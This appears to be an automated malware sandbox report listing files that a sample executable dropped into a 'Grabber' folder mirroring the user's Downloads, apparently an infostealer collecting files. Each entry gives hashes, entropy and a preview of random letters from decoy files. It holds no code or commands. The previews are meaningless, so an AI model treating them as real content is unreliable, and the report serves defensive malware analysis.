Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\DUUDTUBZFW.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\EEGWXUHVUG.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\EEGWXUHVUG.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\EIVQSAOTAQ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\EWZCVGNOWT.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\JDDHMPCDUJ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\PIVFAGEAAV.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZF